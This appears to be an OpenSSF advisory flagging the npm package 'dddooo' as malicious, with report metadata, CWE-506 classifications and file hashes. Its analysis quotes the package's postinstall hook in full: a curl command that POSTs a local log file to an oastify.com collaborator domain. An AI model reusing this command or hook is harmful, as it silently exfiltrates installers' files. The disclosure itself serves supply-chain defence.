-= Per source details. Do not edit below this line.=-
package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$(cat /data/logs/monitor-2026-06-16.log)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data. The script reads a file from the installer's filesystem and POSTs its contents over plain HTTP to an attacker-controlled Burp Collaborator (oastify.com) out-of-band interaction subdomain. The package presents itself as a handy string utility functions library, but has empty author/homepage/repository fields and includes a malformed trunls -lae keyword — the library framing is a cover for the install-time exfiltration. No legitimate string-utility package needs to read system log paths or beacon to oastify.com on install.
The OpenSSF Package Analysis project identified 'dddooo' @ 1.0.2 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
{
"malicious-packages-origins": [
{
"versions": [
"1.0.2"
],
"modified_time": "2026-06-25T10:05:37Z",
"sha256": "99d97fdc7c59d1871a9f0771694688026d7ee92d4bc37cdd48a52db1d9055246",
"source": "ossf-package-analysis",
"import_time": "2026-06-25T10:28:39.723204683Z"
},
{
"versions": [
"1.0.2"
],
"modified_time": "2026-06-25T16:09:42Z",
"sha256": "554ebc4bc4d5915885da6d519c699c7b6c32cdafddd916bdbf9b0f4be039c706",
"id": "IN-MAL-2026-007510",
"source": "amazon-inspector",
"import_time": "2026-06-25T16:23:39.842588817Z"
},
{
"versions": [
"1.0.1"
],
"modified_time": "2026-06-25T16:09:46Z",
"sha256": "29a1f6b05340c6c5543341f1eb014228ca636936f378ab147b03895c41639d92",
"id": "IN-MAL-2026-007512",
"source": "amazon-inspector",
"import_time": "2026-06-25T16:23:39.973601337Z"
},
{
"versions": [
"1.0.0"
],
"modified_time": "2026-06-25T16:09:44Z",
"sha256": "31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948",
"id": "IN-MAL-2026-007511",
"source": "amazon-inspector",
"import_time": "2026-06-25T16:23:39.91871979Z"
}
]
}
[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"package_integrity": [
{
"filename": "dddooo-1.0.2.tgz",
"hashes": {
"sha512_sri": "sha512-x7XDaYR5faRQgQu3DSSU+EREGZ56FlZSyz2SZ0x6S08jv36LbDyBhZYu7uhGHD4CpmnEgaNYA3Rz/FHiYSZb7w==",
"sha1": "281007f49d847ce0683109ef2cad27e4c5c48296"
}
}
],
"evidence_files": [
{
"path": "package.json",
"tlsh": "da01cb18c6345d3319c82b30bdab0642b112ae5709043c1977c3812c0faf7af50fe22d",
"sha256": "47e1d3585afcee791d7f32b2d6c976c2554577cd232b87311834c27db35167d9"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dddooo/MAL-2026-6460.json"